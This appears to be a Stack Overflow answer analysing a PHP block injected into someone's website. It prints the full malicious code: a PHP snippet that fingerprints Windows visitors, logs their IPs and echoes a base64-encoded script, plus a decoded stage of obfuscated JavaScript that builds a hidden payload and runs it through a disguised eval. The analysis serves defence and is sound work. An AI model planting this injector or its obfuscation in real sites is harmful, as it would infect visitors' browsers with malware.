You appear to have an html (php) block injected into your page. Possibly the result of XSS?
First stage decode reveals:
$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr."https://stackoverflow.com/".md5($dr.'1');
if((strpos($ua,'Windows')!==false)&&((strpos($ua,'MSIE')!==false)||(strpos($ua,'Firefox')!==false))&&(strpos(@file_get_contents($dbf),$ip) === false)){
error_reporting(0);
echo(base64_decode('PHNjcmlwdD50cnl7YWJyZSsrfWNhdGNoKGE2YmEzNHkpe3RyeXtwcm90b3R5cGUmMn1jYXRjaChhc2FiKXtlPXdpbmRvd1siZSIrInYiKyJhbCJdO319IGlmKDEpe2Y9Wy00LC01LDkwLDg5LDE4LDI1LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwyNywxMDgsMCwtNSwtNiwtNCw5MSw4NywxMDEsODMsOTQsODgsMTAwLDI1LDI4LDQ1LC0yLC00LC01LDExMCwxOSw4Nyw5MywxMDIsODcsMTcsMTEwLC0xLC02LC00LC01LDg1LDk4LDg1LDEwMiw5Niw4Nyw5NSwxMDMsMzIsMTA0LDEwMSw5MSwxMDEsODgsMjYsMTksNDcsOTEsODcsMTAxLDgzLDk0LDg4LDE4LDEwMCwxMDEsODUsNDYsMjYsOTAsMTAxLDEwMyw5OCw0MywzNCwzMywxMDIsOTIsMTA3LDEwNyw5NCw5Miw5OSwzMyw4NywxMDcsMTA0LDgzLDMxLDg2LDk3LDk0LDM0LDEwNCw4NCwzMyw5OCw4OSw5OSw0OSw4OCw5OCw0NywzNSwyNiwxOCwxMDQsOTIsODYsMTAxLDkxLDQ3LDI0LDM2LDM0LDI0LDE5LDkwLDg2LDkyLDg5LDg5LDEwMyw0NywyNCwzNiwzNCwyNCwxOSwxMDEsMTAxLDEwOCw5NCw4Niw0OCwyNSwxMDMsOTIsMTAxLDkwLDg1LDkxLDkzLDkyLDEwMiwxMDYsNDUsOTAsOTAsODcsODYsODYsOTcsNDUsOTcsOTgsMTAxLDkwLDEwMyw5MSw5Niw5Nyw0NCw4Miw4NSwxMDEsOTYsOTUsMTAzLDEwMSw4OCw0NSw5Myw4OCw4OCwxMDEsNDUsMzQsNDQsMTAzLDk3LDk3LDQ1LDM0LDQ0LDI2LDQ4LDQ1LDM0LDkxLDg3LDEwMSw4Myw5NCw4OCw0OCwxOSwyOCw0NSwtMiwtNCwtNSwxMTAsMCwtNSwtNiw4OSwxMDMsOTUsODYsMTAyLDkwLDk4LDk2LDE3LDkyLDg4LDk5LDg0LDk1LDg2LDEwMSwyNiwyNiwxMTAsLTEsLTYsLTQsLTUsMTAzLDg0LDEwMCwxNyw4OSwxOCw0NiwxOSw4Niw5Niw4NiwxMDMsOTQsODgsOTYsMTAxLDMzLDg1LDk5LDg4LDgzLDEwMSw4OCw1NSw5Myw4OCw5NSw4Niw5NywxMDIsMjUsMjYsOTEsODcsMTAxLDgzLDk0LDg4LDI1LDI2LDQ2LDg4LDMxLDEwMiw4NywxMDEsNTIsMTAyLDEwMSwxMDEsOTEsODMsMTA0LDEwMiw4NiwyNywyNSwxMDAsMTAxLDg1LDI0LDMxLDI1LDg5LDEwMywxMDIsOTcsNDUsMzMsMzIsMTA0LDkxLDEwNiwxMDksOTMsOTEsMTAxLDMyLDg2LDEwOSwxMDMsODIsMzMsODUsOTYsOTYsMzMsMTAzLDg2LDMyLDk3LDkxLDk4LDQ4LDkwLDk3LDQ2LDM3LDI1LDI2LDQ2LDg4LDMxLDEwMiwxMDIsMTA2LDk1LDg3LDMxLDEwNSw5MSwxMDAsOTIsODQsOTAsOTUsOTEsMTAxLDEwOCw0NywyNCw5MSw5MSw4NSw4Nyw4Nyw5NSwyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMyw5OCw5NiwxMDIsOTEsMTAxLDkyLDk3LDk1LDQ4LDI1LDgyLDg1LDEwMSw5Niw5NSwxMDMsMTAxLDg4LDI1LDQ0LDg5LDMyLDEwMCwxMDMsMTA3LDkzLDg4LDMyLDkzLDg4LDg4LDEwMSw0OCwyNSwzMywyNiw0NSw4NywzMywxMDEsMTAxLDEwOCw5NCw4NiwzMywxMDIsOTYsOTksNDcsMjQsMzUsMjUsNDQsODksMzIsMTAwLDg4LDEwMiw1MCwxMDMsMTAyLDk5LDkyLDg0LDEwMiwxMDMsODcsMjUsMjYsMTA1LDkwLDg3LDEwMiw4OSwyNiwzMCwyNCwzNiwzNCwyNCwyOCw0NSw4NywzMywxMDEsODYsMTAzLDUxLDEwMSwxMDMsMTAwLDkwLDg1LDEwMywxMDEsODgsMjYsMjQsOTEsODcsOTAsOTAsOTAsMTAxLDI2LDMwLDI0LDM2LDM0LDI0LDI4LDQ1LC0yLC00LC01LC02LDg3LDk3LDg0LDEwNCw5NSw4Niw5NywxMDIsMzEsOTAsODcsMTAxLDU2LDk0LDg2LDk2LDg3LDk1LDEwMywxMDEsNTEsMTA4LDcwLDgyLDkwLDY0LDgyLDk2LDg3LDI1LDI2LDg0LDk2LDg3LDEwNywyNCwyOCw3NywzMyw4MCwzMiw4Miw5OSw5OCw4Niw5Nyw4Niw1Miw5MSw5MSw5Myw4NywyNiw4NywyOCw0NSwtMiwtNCwtNSwxMTBdO313PWY7cz1bXTtyPVN0cmluZzt4PSJqJSI7Zm9yKGk9MDstaSs1NzkhPTA7aSs9MSl7aj1pO2lmKGUmJigwMzE9PTB4MTkpKXM9cytyLmZyb21DaGFyQ29kZSgoMSp3W2pdK2UoeCszKSsxMykpO30gdHJ5e2FzZ2FzZyYxM31jYXRjaChhc2dhKXtlKHMpO308L3NjcmlwdD4='));
if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
}
Second Stage Decoding Reveals:
try {
abre++
} catch (a6ba34y) {
try {
prototype & 2
} catch (asab) {
e = window["e" + "v" + "al"];
}
}
if (1) {
f = [-4, - 5, 90, 89, 18, 25, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 27, 108, 0, - 5, - 6, - 4, 91, 87, 101, 83, 94, 88, 100, 25, 28, 45, - 2, - 4, - 5, 110, 19, 87, 93, 102, 87, 17, 110, - 1, - 6, - 4, - 5, 85, 98, 85, 102, 96, 87, 95, 103, 32, 104, 101, 91, 101, 88, 26, 19, 47, 91, 87, 101, 83, 94, 88, 18, 100, 101, 85, 46, 26, 90, 101, 103, 98, 43, 34, 33, 102, 92, 107, 107, 94, 92, 99, 33, 87, 107, 104, 83, 31, 86, 97, 94, 34, 104, 84, 33, 98, 89, 99, 49, 88, 98, 47, 35, 26, 18, 104, 92, 86, 101, 91, 47, 24, 36, 34, 24, 19, 90, 86, 92, 89, 89, 103, 47, 24, 36, 34, 24, 19, 101, 101, 108, 94, 86, 48, 25, 103, 92, 101, 90, 85, 91, 93, 92, 102, 106, 45, 90, 90, 87, 86, 86, 97, 45, 97, 98, 101, 90, 103, 91, 96, 97, 44, 82, 85, 101, 96, 95, 103, 101, 88, 45, 93, 88, 88, 101, 45, 34, 44, 103, 97, 97, 45, 34, 44, 26, 48, 45, 34, 91, 87, 101, 83, 94, 88, 48, 19, 28, 45, - 2, - 4, - 5, 110, 0, - 5, - 6, 89, 103, 95, 86, 102, 90, 98, 96, 17, 92, 88, 99, 84, 95, 86, 101, 26, 26, 110, - 1, - 6, - 4, - 5, 103, 84, 100, 17, 89, 18, 46, 19, 86, 96, 86, 103, 94, 88, 96, 101, 33, 85, 99, 88, 83, 101, 88, 55, 93, 88, 95, 86, 97, 102, 25, 26, 91, 87, 101, 83, 94, 88, 25, 26, 46, 88, 31, 102, 87, 101, 52, 102, 101, 101, 91, 83, 104, 102, 86, 27, 25, 100, 101, 85, 24, 31, 25, 89, 103, 102, 97, 45, 33, 32, 104, 91, 106, 109, 93, 91, 101, 32, 86, 109, 103, 82, 33, 85, 96, 96, 33, 103, 86, 32, 97, 91, 98, 48, 90, 97, 46, 37, 25, 26, 46, 88, 31, 102, 102, 106, 95, 87, 31, 105, 91, 100, 92, 84, 90, 95, 91, 101, 108, 47, 24, 91, 91, 85, 87, 87, 95, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 98, 96, 102, 91, 101, 92, 97, 95, 48, 25, 82, 85, 101, 96, 95, 103, 101, 88, 25, 44, 89, 32, 100, 103, 107, 93, 88, 32, 93, 88, 88, 101, 48, 25, 33, 26, 45, 87, 33, 101, 101, 108, 94, 86, 33, 102, 96, 99, 47, 24, 35, 25, 44, 89, 32, 100, 88, 102, 50, 103, 102, 99, 92, 84, 102, 103, 87, 25, 26, 105, 90, 87, 102, 89, 26, 30, 24, 36, 34, 24, 28, 45, 87, 33, 101, 86, 103, 51, 101, 103, 100, 90, 85, 103, 101, 88, 26, 24, 91, 87, 90, 90, 90, 101, 26, 30, 24, 36, 34, 24, 28, 45, - 2, - 4, - 5, - 6, 87, 97, 84, 104, 95, 86, 97, 102, 31, 90, 87, 101, 56, 94, 86, 96, 87, 95, 103, 101, 51, 108, 70, 82, 90, 64, 82, 96, 87, 25, 26, 84, 96, 87, 107, 24, 28, 77, 33, 80, 32, 82, 99, 98, 86, 97, 86, 52, 91, 91, 93, 87, 26, 87, 28, 45, - 2, - 4, - 5, 110];
}
w = f;
s = [];
r = String;
x = "j%";
for (i = 0; - i + 579 != 0; i += 1) {
j = i;
if (e && (031 == 0x19)) s = s + r.fromCharCode((1 * w[j] + e(x + 3) + 13));
}
try {
asgasg & 13
} catch (asga) {
e(s);
}
And then there is further payload obfuscated via a Javascript Packer. I’ll fool around with this a bit more later in the afternoon for those interested in seeing the function of this…
1
solved Can be hacked? [closed]